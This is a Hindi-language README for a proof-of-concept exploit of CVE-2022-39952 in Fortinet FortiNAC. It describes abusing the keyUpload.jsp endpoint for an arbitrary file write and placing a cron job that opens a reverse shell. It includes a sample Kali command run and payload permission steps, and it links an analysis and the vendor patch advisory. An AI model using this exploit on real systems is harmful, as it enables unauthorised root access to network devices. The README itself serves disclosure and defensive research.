
CVE-2022-39952 के लिए POC
Fortinet FortiNAC को प्रभावित करने वाले CVE-2022-39952 के लिए POC
इस एक्सप्लॉइट का डिफ़ॉल्ट कॉन्फ़िगरेशन एक रिवर्स शेल बनाने के लिए एक cron job लिखता है। अपने वातावरण के अनुरूप payload फ़ाइल को बदलना सुनिश्चित करें।
भेद्यता का तकनीकी मूल कारण विश्लेषण और compromise के संकेतक हमारे ब्लॉग पर पाए जा सकते हैं: https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
यह POC एक arbitrary file write प्राप्त करने के लिए keyUpload.jsp एंडपॉइंट का दुरुपयोग करता है।
root@kali:~/CVE-2022-39952# python3 CVE-2022-39952.py --target 10.0.40.85 --file payload
[+] Wrote payload to /etc/cron.d/payload
[+] Payload successfully delivered
यदि cron आधारित payload का उपयोग कर रहे हैं, तो सुनिश्चित करें कि payload फ़ाइल के पास उचित अनुमतियाँ और स्वामी हों:
sudo chown root:root payload
sudo chmod 0644 payload
PSIRT के निर्देशों का पालन करके नवीनतम संस्करण में अपडेट करें https://www.fortiguard.com/psirt/FG-IR-22-300
यह सॉफ़्टवेयर पूरी तरह से अकादमिक शोध और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत होने के अलावा सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। प्रोजेक्ट अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। ज़िम्मेदारी से उपयोग करें।